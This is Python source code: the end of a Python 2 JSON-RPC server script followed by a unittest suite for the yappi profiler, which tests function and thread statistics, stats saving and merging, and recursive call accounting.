trace = jre.trace if hasattr(jre, 'trace') else None
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': jre.code,
'name': jre.message,
'message': jre.data,
'error': trace}
}
except Exception:
trace = traceback.format_exc()
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error occurred',
'error': trace}
}
if 'error' in resp:
exit_code = 500
with open(output_file_path, "w") as f:
f.write(json.dumps(resp, cls=JSONObjectEncoder))
return exit_code
if __name__ == "__main__":
if (len(sys.argv) >= 3 and len(sys.argv) <= 4 and
os.path.isfile(sys.argv[1])):
token = None
if len(sys.argv) == 4:
if os.path.isfile(sys.argv[3]):
with open(sys.argv[3]) as token_file:
token = token_file.read()
else:
token = sys.argv[3]
sys.exit(process_async_cli(sys.argv[1], sys.argv[2], token))
try:
opts, args = getopt(sys.argv[1:], "", ["port=", "host="])
except GetoptError as err:
# print help information and exit:
print str(err) # will print something like "option -a not recognized"
sys.exit(2)
port = 9999
host = 'localhost'
for o, a in opts:
if o == '--port':
port = int(a)
elif o == '--host':
host = a
print "Host set to %s" % host
else:
assert False, "unhandled option"
start_server(host=host, port=port)
# print "Listening on port %s" % port
# httpd = make_server( host, port, application)
#
# httpd.serve_forever()
|
test_functionality.py
|
import os
import sys
import time
import yappi
import _yappi
import utils
import multiprocessing # added to fix http://bugs.python.org/issue15881 for > Py2.6
if sys.version_info < (2, 7): # use unittest2 for < Py2.7
import unittest2 as _unittest
else:
import unittest as _unittest
class BasicUsage(utils.YappiUnitTestCase):
def test_print_formatting(self):
def a():
pass
def b():
a()
func_cols={1:("name",48), 0:("ncall", 5), 2:("tsub", 8),}
thread_cols = {1:("name", 48), 0:("ttot", 8), }
yappi.start()
a(); b();
yappi.stop()
fs = yappi.get_func_stats()
cs = fs[1].children
ts = yappi.get_thread_stats()
#fs.print_all(out=sys.stderr, columns={1:("name", 70), })
#cs.print_all(out=sys.stderr, columns=func_cols)
#ts.print_all(out=sys.stderr, columns=thread_cols)
#cs.print_all(out=sys.stderr, columns={})
self.assertRaises(yappi.YappiError, fs.print_all, columns={1:("namee",9)})
self.assertRaises(yappi.YappiError, cs.print_all, columns={1:("dd",0)})
self.assertRaises(yappi.YappiError, ts.print_all, columns={1:("tidd",0)})
def test_get_clock(self):
yappi.set_clock_type('cpu')
self.assertEqual('cpu', yappi.get_clock_type())
clock_info = yappi.get_clock_info()
self.assertTrue('api' in clock_info)
self.assertTrue('resolution' in clock_info)
yappi.set_clock_type('wall')
self.assertEqual('wall', yappi.get_clock_type())
t0 = yappi.get_clock_time()
time.sleep(0.1)
duration = yappi.get_clock_time() - t0
self.assertAlmostEqual(0.1, duration, places=2)
def test_profile_decorator(self):
def aggregate(func, stats):
fname = "%s.profile" % (func.__name__)
try:
stats.add(fname)
except IOError:
pass
stats.save(fname)
raise Exception("messing around")
@yappi.profile(return_callback=aggregate)
def a(x, y):
if x+y == 25:
raise Exception("")
return x+y
def b():
pass
try:
os.remove("a.profile") # remove the one from prev test, if available
except:
pass
# global profile is on to mess things up
yappi.start()
b()
# assert functionality and call function at same time
try:
self.assertEqual(a(1, 2), 3)
except:
pass
try:
self.assertEqual(a(2, 5), 7)
except:
pass
try:
a(4, 21)
except:
pass
stats = yappi.get_func_stats().add("a.profile")
fsa = utils.find_stat_by_name(stats, 'a')
self.assertEqual(fsa.ncall, 3)
self.assertEqual(len(stats), 1) # b() should be cleared out.
@yappi.profile(return_callback=aggregate)
def count_down_rec(n):
if n == 0:
return
count_down_rec(n-1)
try:
os.remove("count_down_rec.profile") # remove the one from prev test, if available
except:
pass
try:
count_down_rec(4)
except:
pass
try:
count_down_rec(3)
except:
pass
stats = yappi.YFuncStats("count_down_rec.profile")
fsrec = utils.find_stat_by_name(stats, 'count_down_rec')
self.assertEqual(fsrec.ncall, 9)
self.assertEqual(fsrec.nactualcall, 2)
def test_strip_dirs(self):
def a():
pass
stats = utils.run_and_get_func_stats(a,)
stats.strip_dirs()
fsa = utils.find_stat_by_name(stats, "a")
self.assertEqual(fsa.module, os.path.basename(fsa.module))
def test_yappi_overhead(self):
import time
LOOP_COUNT = 10000
def a(): pass
def b():
for i in range(LOOP_COUNT): a()
t0 = time.time()
yappi.start()
b()
yappi.stop()
time_with_yappi = time.time() - t0
t0 = time.time()
b()
time_without_yappi = time.time() - t0
if time_without_yappi == 0:
time_without_yappi = 0.000001
# in latest v0.82, I calculated this as close to "7.0" in my machine.
# however, %83 of this overhead is coming from tickcount(). The other %17
# seems to have been evenly distributed to the internal bookkeeping
# structures/algorithms which seems acceptable. Note that our test only
# tests one function being profiled at-a-time in a short interval.
# profiling high number of functions in a small time
# is a different beast, (which is pretty unlikely in most applications)
# So as a conclusion: I cannot see any optimization window for Yappi that
# is worth implementing as we will only optimize %17 of the time.
sys.stderr.write("\r\nYappi puts %0.1f times overhead to the profiled application in average.\r\n" % \
(time_with_yappi / time_without_yappi))
def test_clear_stats_while_running(self):
def a():
pass
yappi.start()
a()
yappi.clear_stats()
a()
stats = yappi.get_func_stats()
fsa = utils.find_stat_by_name(stats, 'a')
self.assertEqual(fsa.ncall, 1)
def test_generator(self):
def _gen(n):
while(n > 0):
yield n
n -= 1
yappi.start()
for x in _gen(5):
pass
self.assertTrue(yappi.convert2pstats(yappi.get_func_stats()) is not None)
def test_slice_child_stats_and_strip_dirs(self):
def b():
for i in range(10000000): pass
def a():
b()
yappi.start(builtins=True)
a()
stats = yappi.get_func_stats()
fsa = utils.find_stat_by_name(stats, 'a')
fsb = utils.find_stat_by_name(stats, 'b')
self.assertTrue(fsa.children[0:1] is not None)
prev_afullname = fsa.full_name
prev_bchildfullname = fsa.children[fsb].full_name
stats.strip_dirs()
self.assertTrue(len(prev_afullname) > len(fsa.full_name))
self.assertTrue(len(prev_bchildfullname) > len(fsa.children[fsb].full_name))
def test_children_stat_functions(self):
_timings = {"a_1":5, "b_1":3, "c_1":1}
_yappi._set_test_timings(_timings)
def b():
pass
def c():
pass
def a():
b()
c()
yappi.start()
a()
b() # non-child call
c() # non-child call
stats = yappi.get_func_stats()
fsa = utils.find_stat_by_name(stats, 'a')
childs_of_a = fsa.children.get().sort("tavg", "desc")
prev_item = None
for item in childs_of_a:
if prev_item:
self.assertTrue(prev_item.tavg > item.tavg)
prev_item = item
childs_of_a.sort("name", "desc")
prev_item = None
for item in childs_of_a:
if prev_item:
self.assertTrue(prev_item.name > item.name)
prev_item = item
childs_of_a.clear()
self.assertTrue(childs_of_a.empty())
def test_no_stats_different_clock_type_load(self):
def a(): pass
yappi.start()
a()
yappi.stop()
yappi.get_func_stats().save("ystats1.ys")
yappi.clear_stats()
yappi.set_clock_type("WALL")
yappi.start()
yappi.stop()
stats = yappi.get_func_stats().add("ystats1.ys")
fsa = utils.find_stat_by_name(stats, 'a')
self.assertTrue(fsa is not None)
def test_subsequent_profile(self):
_timings = {"a_1":1, "b_1":1}
_yappi._set_test_timings(_timings)
def a(): pass
def b(): pass
yappi.start()
a()
yappi.stop()
yappi.start()
b()
yappi.stop()
stats = yappi.get_func_stats()
fsa = utils.find_stat_by_name(stats, 'a')
fsb = utils.find_stat_by_name(stats, 'b')
self.assertTrue(fsa is not None)
self.assertTrue(fsb is not None)
self.assertEqual(fsa.ttot, 1)
self.assertEqual(fsb.ttot, 1)
def test_lambda(self):
import time
f = lambda : time.sleep(0.3)
yappi.set_clock_type("wall")
yappi.start()
f()
stats = yappi.get_func_stats()
fsa = utils.find_stat_by_name(stats, '<lambda>')
self.assertTrue(fsa.ttot > 0.1)
def test_module_stress(self):
self.assertEqual(yappi.is_running(), False)
yappi.start()
yappi.clear_stats()
self.assertRaises(_yappi.error, yappi.set_clock_type, "wall")
yappi.stop()
yappi.clear_stats()
yappi.set_clock_type("cpu")
self.assertRaises(yappi.YappiError, yappi.set_clock_type, "dummy")
self.assertEqual(yappi.is_running(), False)
yappi.clear_stats()
yappi.clear_stats()
def test_stat_sorting(self):
_timings = {"a_1":13,"b_1":10,"a_2":6,"b_2":1}
_yappi._set_test_timings(_timings)
self._ncall = 1
def a():
b()
def b():
if self._ncall == 2:
return
self._ncall += 1
a()
stats = utils.run_and_get_func_stats(a)
stats = stats.sort("totaltime", "desc")
prev_stat = None
for stat in stats:
if prev_stat:
self.assertTrue(prev_stat.ttot >= stat.ttot)
prev_stat = stat
stats = stats.sort("totaltime", "asc")
prev_stat = None
for stat in stats:
if prev_stat:
self.assertTrue(prev_stat.ttot <= stat.ttot)
prev_stat = stat
stats = stats.sort("avgtime", "asc")
prev_stat = None
for stat in stats:
if prev_stat:
self.assertTrue(prev_stat.tavg <= stat.tavg)
prev_stat = stat
stats = stats.sort("name", "asc")
prev_stat = None
for stat in stats:
if prev_stat:
self.assertTrue(prev_stat.name <= stat.name)
prev_stat = stat
stats = stats.sort("subtime", "asc")
prev_stat = None
for stat in stats:
if prev_stat:
self.assertTrue(prev_stat.tsub <= stat.tsub)
prev_stat = stat
self.assertRaises(yappi.YappiError, stats.sort, "invalid_func_sorttype_arg")
self.assertRaises(yappi.YappiError, stats.sort, "totaltime", "invalid_func_sortorder_arg")
def test_start_flags(self):
self.assertEqual(_yappi._get_start_flags(), None)
yappi.start()
def a(): pass
a()
self.assertEqual(_yappi._get_start_flags()["profile_builtins"], 0)
self.assertEqual(_yappi._get_start_flags()["profile_multithread"], 1)
self.assertEqual(len(yappi.get_thread_stats()), 1)
def test_builtin_profiling(self):
import threading
def a():
import time
time.sleep(0.4) # is a builtin function
yappi.set_clock_type('wall')
yappi.start(builtins=True)
a()
stats = yappi.get_func_stats()
fsa = utils.find_stat_by_name(stats, 'sleep')
self.assertTrue(fsa is not None)
self.assertTrue(fsa.ttot > 0.3)
yappi.stop()
yappi.clear_stats()
def a():
pass
yappi.start()
t = threading.Thread(target=a)
t.start()
t.join()
stats = yappi.get_func_stats()
def test_singlethread_profiling(self):
import threading
import time
yappi.set_clock_type('wall')
def a():
time.sleep(0.2)
class Worker1(threading.Thread):
def a(self):
time.sleep(0.3)
def run(self):
self.a()
yappi.start(profile_threads=False)
c = Worker1()
c.start()
c.join()
a()
stats = yappi.get_func_stats()
fsa1 = utils.find_stat_by_name(stats, 'Worker1.a')
fsa2 = utils.find_stat_by_name(stats, 'a')
self.assertTrue(fsa1 is None)
self.assertTrue(fsa2 is not None)
self.assertTrue(fsa2.ttot > 0.1)
class StatSaveScenarios(utils.YappiUnitTestCase):
def test_pstats_conversion(self):
def pstat_id(fs):
return (fs.module, fs.lineno, fs.name)
def a():
d()
def b():
d()
def c():
pass
def d():
pass
_timings = {"a_1":12,"b_1":7,"c_1":5,"d_1":2}
_yappi._set_test_timings(_timings)
stats = utils.run_and_get_func_stats(a,)
stats.strip_dirs()
stats.save("a1.pstats", type="pstat")
fsa_pid = pstat_id(utils.find_stat_by_name(stats, "a"))
fsd_pid = pstat_id(utils.find_stat_by_name(stats, "d"))
yappi.clear_stats()
_yappi._set_test_timings(_timings)
stats = utils.run_and_get_func_stats(a,)
stats.strip_dirs()
stats.save("a2.pstats", type="pstat")
yappi.clear_stats()
_yappi._set_test_timings(_timings)
stats = utils.run_and_get_func_stats(b,)
stats.strip_dirs()
stats.save("b1.pstats", type="pstat")
fsb_pid = pstat_id(utils.find_stat_by_name(stats, "b"))
yappi.clear_stats()
_yappi._set_test_timings(_timings)
stats = utils.run_and_get_func_stats(c,)
stats.strip_dirs()
stats.save("c1.pstats", type="pstat")
fsc_pid = pstat_id(utils.find_stat_by_name(stats, "c"))
# merge saved stats and check pstats values are correct
import pstats
p = pstats.Stats('a1.pstats', 'a2.pstats', 'b1.pstats', 'c1.pstats')
p.strip_dirs()
# ct = ttot, tt = tsub
(cc, nc, tt, ct, callers) = p.stats[fsa_pid]
self.assertEqual(cc, nc, 2)
self.assertEqual(tt, 20)
self.assertEqual(ct, 24)
(cc, nc, tt, ct, callers) = p.stats[fsd_pid]
self.assertEqual(cc, nc, 3)
self.assertEqual(tt, 6)
self.assertEqual(ct, 6)
self.assertEqual(len(callers), 2)
(cc, nc, tt, ct) = callers[fsa_pid]
self.assertEqual(cc, nc, 2)
self.assertEqual(tt, 4)
self.assertEqual(ct, 4)
(cc, nc, tt, ct) = callers[fsb_pid]
self.assertEqual(cc, nc, 1)
self.assertEqual(tt, 2)
self.assertEqual(ct, 2)
def test_merge_stats(self):
_timings = {"a_1":15,"b_1":14,"c_1":12,"d_1":10,"e_1":9,"f_1":7,"g_1":6,"h_1":5,"i_1":1}
_yappi._set_test_timings(_timings)
def a():
b()
def b():
c()
def c():
d()
def d():
e()
def e():
f()
def f():
g()
def g():
h()
def h():
i()
def i():
pass
yappi.start()
a()
a()
yappi.stop()
stats = yappi.get_func_stats()
self.assertRaises(NotImplementedError, stats.save, "", "INVALID_SAVE_TYPE")
stats.save("ystats2.ys")
yappi.clear_stats()
_yappi._set_test_timings(_timings)
yappi.start()
a()
stats = yappi.get_func_stats().add("ystats2.ys")
fsa = utils.find_stat_by_name(stats, "a")
fsb = utils.find_stat_by_name(stats, "b")
fsc = utils.find_stat_by_name(stats, "c")
fsd = utils.find_stat_by_name(stats, "d")
fse = utils.find_stat_by_name(stats, "e")
fsf = utils.find_stat_by_name(stats, "f")
fsg = utils.find_stat_by_name(stats, "g")
fsh = utils.find_stat_by_name(stats, "h")
fsi = utils.find_stat_by_name(stats, "i")
self.assertEqual(fsa.ttot, 45)
self.assertEqual(fsa.ncall, 3)
self.assertEqual(fsa.nactualcall, 3)
self.assertEqual(fsa.tsub, 3)
self.assertEqual(fsa.children[fsb].ttot, fsb.ttot)
self.assertEqual(fsa.children[fsb].tsub, fsb.tsub)
self.assertEqual(fsb.children[fsc].ttot, fsc.ttot)
self.assertEqual(fsb.children[fsc].tsub, fsc.tsub)
self.assertEqual(fsc.tsub, 6)
self.assertEqual(fsc.children[fsd].ttot, fsd.ttot)
self.assertEqual(fsc.children[fsd].tsub, fsd.tsub)
self.assertEqual(fsd.children[fse].ttot, fse.ttot)
self.assertEqual(fsd.children[fse].tsub, fse.tsub)
self.assertEqual(fse.children[fsf].ttot, fsf.ttot)
self.assertEqual(fse.children[fsf].tsub, fsf.tsub)
self.assertEqual(fsf.children[fsg].ttot, fsg.ttot)
self.assertEqual(fsf.children[fsg].tsub, fsg.tsub)
self.assertEqual(fsg.ttot, 18)
self.assertEqual(fsg.tsub, 3)
self.assertEqual(fsg.children[fsh].ttot, fsh.ttot)
self.assertEqual(fsg.children[fsh].tsub, fsh.tsub)
self.assertEqual(fsh.ttot, 15)
self.assertEqual(fsh.tsub, 12)
self.assertEqual(fsh.tavg, 5)
self.assertEqual(fsh.children[fsi].ttot, fsi.ttot)
self.assertEqual(fsh.children[fsi].tsub, fsi.tsub)
#stats.debug_print()
def test_merge_multithreaded_stats(self):
import threading
import _yappi
timings = {"a_1":2, "b_1":1}
_yappi._set_test_timings(timings)
def a(): pass
def b(): pass
yappi.start()
t = threading.Thread(target=a)
t.start()
t.join()
t = threading.Thread(target=b)
t.start()
t.join()
yappi.get_func_stats().save("ystats1.ys")
yappi.clear_stats()
_yappi._set_test_timings(timings)
self.assertEqual(len(yappi.get_func_stats()), 0)
self.assertEqual(len(yappi.get_thread_stats()), 1)
t = threading.Thread(target=a)
t.start()
t.join()
self.assertEqual(_yappi._get_start_flags()["profile_builtins"], 0)
self.assertEqual(_yappi._get_start_flags()["profile_multithread"], 1)
yappi.get_func_stats().save("ystats2.ys")
stats = yappi.YFuncStats(["ystats1.ys", "ystats2.ys",])
fsa = utils.find_stat_by_name(stats, "a")
fsb = utils.find_stat_by_name(stats, "b")
self.assertEqual(fsa.ncall, 2)
self.assertEqual(fsb.ncall, 1)
self.assertEqual(fsa.tsub, fsa.ttot, 4)
self.assertEqual(fsb.tsub, fsb.ttot, 1)
def test_merge_load_different_clock_types(self):
import threading
yappi.start(builtins=True)
def a(): b()
def b(): c()
def c(): pass
t = threading.Thread(target=a)
t.start()
t.join()
yappi.get_func_stats().sort("name", "asc").save("ystats1.ys")
yappi.stop()
yappi.clear_stats()
yappi.start(builtins=False)
t = threading.Thread(target=a)
t.start()
t.join()
yappi.get_func_stats().save("ystats2.ys")
yappi.stop()
self.assertRaises(_yappi.error, yappi.set_clock_type, "wall")
yappi.clear_stats()
yappi.set_clock_type("wall")
yappi.start()
t = threading.Thread(target=a)
t.start()
t.join()
yappi.get_func_stats().save("ystats3.ys")
self.assertRaises(yappi.YappiError, yappi.YFuncStats().add("ystats1.ys").add, "ystats3.ys")
stats = yappi.YFuncStats(["ystats1.ys", "ystats2.ys"]).sort("name")
fsa = utils.find_stat_by_name(stats, "a")
fsb = utils.find_stat_by_name(stats, "b")
fsc = utils.find_stat_by_name(stats, "c")
self.assertEqual(fsa.ncall, 2)
self.assertEqual(fsa.ncall, fsb.ncall, fsc.ncall)
def test_merge_aabab_aabbc(self):
_timings = {"a_1":15,"a_2":14,"b_1":12,"a_3":10,"b_2":9, "c_1":4}
_yappi._set_test_timings(_timings)
def a():
if self._ncall == 1:
self._ncall += 1
a()
elif self._ncall == 5:
self._ncall += 1
a()
else:
b()
def b():
if self._ncall == 2:
self._ncall += 1
a()
elif self._ncall == 6:
self._ncall += 1
b()
elif self._ncall == 7:
c()
else:
return
def c():
pass
self._ncall = 1
stats = utils.run_and_get_func_stats(a,)
stats.save("ystats1.ys")
yappi.clear_stats()
_yappi._set_test_timings(_timings)
#stats.print_all()
self._ncall = 5
stats = utils.run_and_get_func_stats(a,)
stats.save("ystats2.ys")
#stats.print_all()
def a(): # same name but another function(code object)
pass
yappi.start()
a()
stats = yappi.get_func_stats().add(["ystats1.ys", "ystats2.ys"])
#stats.print_all()
self.assertEqual(len(stats), 4)
fsa = None
for stat in stats:
if stat.name == "a" and stat.ttot == 45:
fsa = stat
break
self.assertTrue(fsa is not None)
self.assertEqual(fsa.ncall, 7)
self.assertEqual(fsa.nactualcall, 3)
self.assertEqual(fsa.ttot, 45)
self.assertEqual(fsa.tsub, 10)
fsb = utils.find_stat_by_name(stats, "b")
fsc = utils.find_stat_by_name(stats, "c")
self.assertEqual(fsb.ncall, 6)
self.assertEqual(fsb.nactualcall, 3)
self.assertEqual(fsb.ttot, 36)
self.assertEqual(fsb.tsub, 27)
self.assertEqual(fsb.tavg, 6)
self.assertEqual(fsc.ttot, 8)
self.assertEqual(fsc.tsub, 8)
self.assertEqual(fsc.tavg, 4)
self.assertEqual(fsc.nactualcall, fsc.ncall, 2)
"""
"""
class MultithreadedScenarios(utils.YappiUnitTestCase):
def test_subsequent_profile(self):
import threading
WORKER_COUNT = 5
def a(): pass
def b(): pass
def c(): pass
_timings = {"a_1":3,"b_1":2,"c_1":1,}
yappi.start()
def g(): pass
g()
yappi.stop()
yappi.clear_stats()
_yappi._set_test_timings(_timings)
yappi.start()
_dummy = []
for i in range(WORKER_COUNT):
t = threading.Thread(target=a)
t.start()
t.join()
for i in range(WORKER_COUNT):
t = threading.Thread(target=b)
t.start()
_dummy.append(t)
t.join()
for i in range(WORKER_COUNT):
t = threading.Thread(target=a)
t.start()
t.join()
for i in range(WORKER_COUNT):
t = threading.Thread(target=c)
t.start()
t.join()
yappi.stop()
yappi.start()
def f():
pass
f()
stats = yappi.get_func_stats()
fsa = utils.find_stat_by_name(stats, 'a')
fsb = utils.find_stat_by_name(stats, 'b')
fsc = utils.find_stat_by_name(stats, 'c')
self.assertEqual(fsa.ncall, 10)
self.assertEqual(fsb.ncall, 5)
self.assertEqual(fsc.ncall, 5)
self.assertEqual(fsa.ttot, fsa.tsub, 30)
self.assertEqual(fsb.ttot, fsb.tsub, 10)
self.assertEqual(fsc.ttot, fsc.tsub, 5)
# MACOSx optimizes by only creating one worker thread
self.assertTrue(len(yappi.get_thread_stats()) >= 2)
def test_basic(self):
import threading
import time
yappi.set_clock_type('wall')
def a():
time.sleep(0.2)
class Worker1(threading.Thread):
def a(self):
time.sleep(0.3)
def run(self):
self.a()
yappi.start(builtins=False, profile_threads=True)
c = Worker1()
c.start()
c.join()
a()
stats = yappi.get_func_stats()
fsa1 = utils.find_stat_by_name(stats, 'Worker1.a')
fsa2 = utils.find_stat_by_name(stats, 'a')
self.assertTrue(fsa1 is not None)
self.assertTrue(fsa2 is not None)
self.assertTrue(fsa1.ttot > 0.2)
self.assertTrue(fsa2.ttot > 0.1)
tstats = yappi.get_thread_stats()
self.assertEqual(len(tstats), 2)
tsa = utils.find_stat_by_name(tstats, 'Worker1')
tsm = utils.find_stat_by_name(tstats, '_MainThread')
self.assertTrue(tsa is not None)
self.assertTrue(tsm is not None) # FIX: I see this fails sometimes?
def test_ctx_stats(self):
from threading import Thread
DUMMY_WORKER_COUNT = 5
yappi.start()
class DummyThread(Thread): pass
def dummy_worker():
pass
for i in range(DUMMY_WORKER_COUNT):
t = DummyThread(target=dummy_worker)
t.start()
t.join()
yappi.stop()
stats = yappi.get_thread_stats()
tsa = utils.find_stat_by_name(stats, "DummyThread")
self.assertTrue(tsa is not None)
yappi.clear_stats()
import time
time.sleep(1.0)
_timings = {"a_1":6,"b_1":5,"c_1":3, "d_1":1, "a_2":4,"b_2":3,"c_2":2, "d_2":1}
_yappi._set_test_timings(_timings)
class Thread1(Thread): pass
class Thread2(Thread): pass
def a():
b()
def b():
c()
def c():
d()
def d():
time.sleep(0.6)
yappi.set_clock_type("wall")
yappi.start()
t1 = Thread1(target=a)
t1.start()
t2 = Thread2(target=a)
t2.start()
t1.join()
t2.join()
stats = yappi.get_thread_stats()
# the fist clear_stats clears the context table?
tsa = utils.find_stat_by_name(stats, "DummyThread")
self.assertTrue(tsa is None)
tst1 = utils.find_stat_by_name(stats, "Thread1")
tst2 = utils.find_stat_by_name(stats, "Thread2")
tsmain = utils.find_stat_by_name(stats, "_MainThread")
#stats.print_all()
self.assertTrue(len(stats) == 3)
self.assertTrue(tst1 is not None)
self.assertTrue(tst2 is not None)
self.assertTrue(tsmain is not None) # I see this fails sometimes, probably
# because Py_ImportNoBlock() fails to import and get the thread class name
# sometimes.
self.assertTrue(1.0 > tst2.ttot >= 0.5)
self.assertTrue(1.0 > tst1.ttot >= 0.5)
# test sorting of the ctx stats
stats = stats.sort("totaltime", "desc")
prev_stat = None
for stat in stats:
if prev_stat:
self.assertTrue(prev_stat.ttot >= stat.ttot)
prev_stat = stat
stats = stats.sort("totaltime", "asc")
prev_stat = None
for stat in stats:
if prev_stat:
self.assertTrue(prev_stat.ttot <= stat.ttot)
prev_stat = stat
stats = stats.sort("schedcount", "desc")
prev_stat = None
for stat in stats:
if prev_stat:
self.assertTrue(prev_stat.sched_count >= stat.sched_count)
prev_stat = stat
stats = stats.sort("name", "desc")
prev_stat = None
for stat in stats:
if prev_stat:
self.assertTrue(prev_stat.name >= stat.name)
prev_stat = stat
self.assertRaises(yappi.YappiError, stats.sort, "invalid_thread_sorttype_arg")
self.assertRaises(yappi.YappiError, stats.sort, "invalid_thread_sortorder_arg")
def test_producer_consumer_with_queues(self):
# we currently just stress yappi, no functionality test is done here.
yappi.start()
import time
if utils.is_py3x():
from queue import Queue
else:
from Queue import Queue
from threading import Thread
WORKER_THREAD_COUNT = 50
WORK_ITEM_COUNT = 2000
def worker():
while True:
item = q.get()
# do the work with item
q.task_done()
q = Queue()
for i in range(WORKER_THREAD_COUNT):
t = Thread(target=worker)
t.daemon = True
t.start()
for item in range(WORK_ITEM_COUNT):
q.put(item)
q.join()# block until all tasks are done
#yappi.get_func_stats().sort("callcount").print_all()
yappi.stop()
def test_temporary_lock_waiting(self):
import threading
import time
yappi.start()
_lock = threading.Lock()
def worker():
_lock.acquire()
try:
time.sleep(1.0)
finally:
_lock.release()
t1 = threading.Thread(target=worker)
t2 = threading.Thread(target=worker)
t1.start()
t2.start()
t1.join()
t2.join()
#yappi.get_func_stats().sort("callcount").print_all()
yappi.stop()
@_unittest.skipIf(os.name != "posix", "requires Posix compliant OS")
def test_signals_with_blocking_calls(self):
import signal, os, time
# just to verify if signal is handled correctly and stats/yappi are not corrupted.
def handler(signum, frame):
raise Exception("Signal handler executed!")
yappi.start()
signal.signal(signal.SIGALRM, handler)
signal.alarm(1)
self.assertRaises(Exception, time.sleep, 2)
stats = yappi.get_func_stats()
fsh = utils.find_stat_by_name(stats, "handler")
self.assertTrue(fsh is not None)
@_unittest.skipIf(not sys.version_info >= (3, 2), "requires Python 3.2")
def test_concurrent_futures(self):
yappi.start()
import time
from concurrent.futures import ThreadPoolExecutor
with ThreadPoolExecutor(max_workers=5) as executor:
f = executor.submit(pow, 5, 2)
self.assertEqual(f.result(), 25)
time.sleep(1.0)
yappi.stop()
@_unittest.skipIf(not sys.version_info >= (3, 2), "requires Python 3.2")
def test_barrier(self):
yappi.start()
import threading
b = threading.Barrier(2, timeout=1)
def worker():
try:
b.wait()
except threading.BrokenBarrierError:
pass
except Exception:
raise Exception("BrokenBarrierError not raised")
t1 = threading.Thread(target=worker)
t1.start()
#b.wait()
t1.join()
yappi.stop()
class NonRecursiveFunctions(utils.YappiUnitTestCase):
def test_abcd(self):
_timings = {"a_1":6,"b_1":5,"c_1":3, "d_1":1}
_yappi._set_test_timings(_timings)
def a():
b()
def b():
c()
def c():
d()
def d():
pass
stats = utils.run_and_get_func_stats(a)
fsa = utils.find_stat_by_name(stats, 'a')
fsb = utils.find_stat_by_name(stats, 'b')
fsc = utils.find_stat_by_name(stats, 'c')
fsd = utils.find_stat_by_name(stats, 'd')
cfsab = fsa.children[fsb]
cfsbc = fsb.children[fsc]
cfscd = fsc.children[fsd]
self.assertEqual(fsa.ttot , 6)
self.assertEqual(fsa.tsub , 1)
self.assertEqual(fsb.ttot , 5)
self.assertEqual(fsb.tsub , 2)
self.assertEqual(fsc.ttot , 3)
self.assertEqual(fsc.tsub , 2)
self.assertEqual(fsd.ttot , 1)
self.assertEqual(fsd.tsub , 1)
self.assertEqual(cfsab.ttot , 5)
self.assertEqual(cfsab.tsub , 2)
self.assertEqual(cfsbc.ttot , 3)
self.assertEqual(cfsbc.tsub , 2)
self.assertEqual(cfscd.ttot , 1)
self.assertEqual(cfscd.tsub , 1)
def test_stop_in_middle(self):
import time
_timings = {"a_1":6,"b_1":4}
_yappi._set_test_timings(_timings)
def a():
b()
yappi.stop()
def b():
time.sleep(0.2)
yappi.start()
a()
stats = yappi.get_func_stats()
fsa = utils.find_stat_by_name(stats, 'a')
fsb = utils.find_stat_by_name(stats, 'b')
self.assertEqual(fsa.ncall , 1)
self.assertEqual(fsa.nactualcall, 0)
self.assertEqual(fsa.ttot , 0) # no call_leave called
self.assertEqual(fsa.tsub , 0) # no call_leave called
self.assertEqual(fsb.ttot , 4)
class RecursiveFunctions(utils.YappiUnitTestCase):
def test_fibonacci(self):
def fib(n):
if n > 1:
return fib(n-1) + fib(n-2)
else:
return n
stats = utils.run_and_get_func_stats(fib, 22)
fs = utils.find_stat_by_name(stats, 'fib')
self.assertEqual(fs.ncall, 57313)
self.assertEqual(fs.ttot, fs.tsub)
def test_abcadc(self):
_timings = {"a_1":20,"b_1":19,"c_1":17, "a_2":13, "d_1":12, "c_2":10, "a_3":5}
_yappi._set_test_timings(_timings)
def a(n):
if n == 3:
return
if n == 1 + 1:
d(n)
else:
b(n)
def b(n):
c(n)
def c(n):
a(n+1)
def d(n):
c(n)
stats = utils.run_and_get_func_stats(a, 1)
fsa = utils.find_stat_by_name(stats, 'a')
fsb = utils.find_stat_by_name(stats, 'b')
fsc = utils.find_stat_by_name(stats, 'c')
fsd = utils.find_stat_by_name(stats, 'd')
self.assertEqual(fsa.ncall, 3)
self.assertEqual(fsa.nactualcall, 1)
self.assertEqual(fsa.ttot, 20)
self.assertEqual(fsa.tsub, 7)
self.assertEqual(fsb.ttot, 19)
self.assertEqual(fsb.tsub, 2)
self.assertEqual(fsc.ttot, 17)
self.assertEqual(fsc.tsub, 9)
self.assertEqual(fsd.ttot, 12)
self.assertEqual(fsd.tsub, 2)
cfsca = fsc.children[fsa]
self.assertEqual(cfsca.nactualcall, 0)
self.assertEqual(cfsca.ncall, 2)
self.assertEqual(cfsca.ttot, 13)
self.assertEqual(cfsca.tsub, 6)
def test_aaaa(self):
_timings = {"d_1":9, "d_2":7, "d_3":3, "d_4":2}
_yappi._set_test_timings(_timings)
def d(n):
if n == 3:
return
d(n+1)
stats = utils.run_and_get_func_stats(d, 0)
fsd = utils.find_stat_by_name(stats, 'd')
self.assertEqual(fsd.ncall , 4)
self.assertEqual(fsd.nactualcall , 1)
self.assertEqual(fsd.ttot , 9)
self.assertEqual(fsd.tsub , 9)
cfsdd = fsd.children[fsd]
self.assertEqual(cfsdd.ttot , 7)
self.assertEqual(cfsdd.tsub , 7)
self.assertEqual(cfsdd.ncall , 3)
self.assertEqual(cfsdd.nactualcall , 0)
def test_abcabc(self):
_timings = {"a_1":20,"b_1":19,"c_1":17, "a_2":13, "b_2":11, "c_2":9, "a_3":6}
_yappi._set_test_timings(_timings)
def a(n):
if n == 3:
return
else:
b(n)
def b(n):
c(n)
def c(n):
a(n+1)
stats = utils.run_and_get_func_stats(a, 1)
fsa = utils.find_stat_by_name(stats, 'a')
fsb = utils.find_stat_by_name(stats, 'b')
fsc = utils.find_stat_by_name(stats, 'c')
self.assertEqual(fsa.ncall , 3)
self.assertEqual(fsa.nactualcall , 1)
self.assertEqual(fsa.ttot , 20)
self.assertEqual(fsa.tsub , 9)
self.assertEqual(fsb.ttot , 19)
self.assertEqual(fsb.tsub , 4)
self.assertEqual(fsc.ttot , 17)
self.assertEqual(fsc.tsub , 7)
cfsab = fsa.children[fsb]
cfsbc = fsb.children[fsc]
cfsca = fsc.children[fsa]
self.assertEqual(cfsab.ttot , 19)
self.assertEqual(cfsab.tsub , 4)
self.assertEqual(cfsbc.ttot , 17)
self.assertEqual(cfsbc.tsub , 7)
